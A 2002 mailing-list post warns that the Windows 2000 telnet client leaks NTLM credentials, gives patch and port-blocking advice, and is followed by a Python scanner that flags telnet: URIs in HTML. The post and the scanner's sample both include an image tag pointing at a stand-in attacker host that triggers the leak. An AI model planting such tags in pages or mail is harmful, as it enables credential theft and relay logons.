Firewall Wizards mailing list archives
Re: Danger of telnet on w2k (Was: re: Annoying pop-ups)
From: Mikael Olsson <mikael.olsson () clavister com>
Date: Wed, 30 Oct 2002 16:42:10 +0100
Mikael Olsson wrote:
> PLUS port 23 (Telnet!) Sure, it isn't on by default, but people found ways to abuse DCOM to turn it on remotely. Uh oh.
I just figured that this deserved a bit of extra mention. I'm sure that most people think "Bah. I've got a good admin password, and I don't log on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth in telnet in w2k. This means that, unless instructed to do otherwise, the w2k telnet client will send out NTLM authentication data of the currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used to log on to you without delay. It can also be fed to l0phtcrack.

Microsoft did indeed send out an advisory about this two years ago, but I figured it deserved another mention, seeing as how people still tend to forget about this.

All it needs is an image tag like

    <img src="telnet://evilserver.int:2323">

Stuff that can help:

- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp and install patch. The patch is to display a warning before NTLM is sent to stuff outside the local zone. However, we have seen the zone schemes be subverted before, so don't rely on it.
- Block port 23 inbound to avoid the direct relay back to your telnet port. Disabling the telnet service might be a good idea, but don't rely on it.
- Run "telnet" without arguments. Type "unset ntlm". This prevents the telnet client from sending NTLM hashes at all.
- Blocking port 23 outbound will NOT help.

--
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00 Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50 WWW: http://www.clavister.com

Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."
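A defensive check for the `<img src="telnet://...">` trigger mentioned in the message above, as an added example that is not part of the original post: a Python scanner that a mail or web content filter could run over HTML to flag `telnet:` URIs. The attribute and tag lists, the function names and the sample HTML (apart from the post's own image tag) are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

BLOCKED_SCHEMES = {"telnet"}
# Attributes that can carry a URL (assumed list, extend as needed).
URL_ATTRS = {"src", "href", "background", "data", "action", "poster"}
# Tags whose URL is dereferenced on render, without a user click.
AUTOLOAD_TAGS = {"img", "iframe", "frame", "embed", "object", "body", "link", "meta"}

def _scheme(url):
    """Return the lower-cased URL scheme after browser-style normalisation."""
    cleaned = re.sub(r"[\t\r\n]", "", url)          # browsers drop these inside URLs
    cleaned = re.sub(r"^[\x00-\x20]+", "", cleaned)  # and ignore leading controls/spaces
    m = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned, re.I)
    return m.group(1).lower() if m else ""

class TelnetUriFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (line, tag, attribute, loads_without_click, value)

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded character references in attribute values.
        attrs_d = {k: (v or "") for k, v in attrs}
        candidates = [(k, v) for k, v in attrs_d.items() if k in URL_ATTRS]
        if tag == "meta" and attrs_d.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?(.*)", attrs_d.get("content", ""), re.I | re.S)
            if m:
                candidates.append(("content", m.group(1)))
        for name, value in candidates:
            if _scheme(value) in BLOCKED_SCHEMES:
                self.findings.append(
                    (self.getpos()[0], tag, name, tag in AUTOLOAD_TAGS, value.strip()))

def scan_html(html_text):
    finder = TelnetUriFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings

# Constructed sample; the first tag is the one quoted in the post.
SAMPLE = """<html><body>
<img src="telnet://evilserver.int:2323">
<a href="TELNET://host.example:23">console</a>
<img src="te&#108;net://host.example:2323" width=1>
<img src="https://host.example/logo.png">
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

Findings with `loads_without_click` set to `True` are the ones that match the scenario in the post, where rendering the page is enough to start the telnet client.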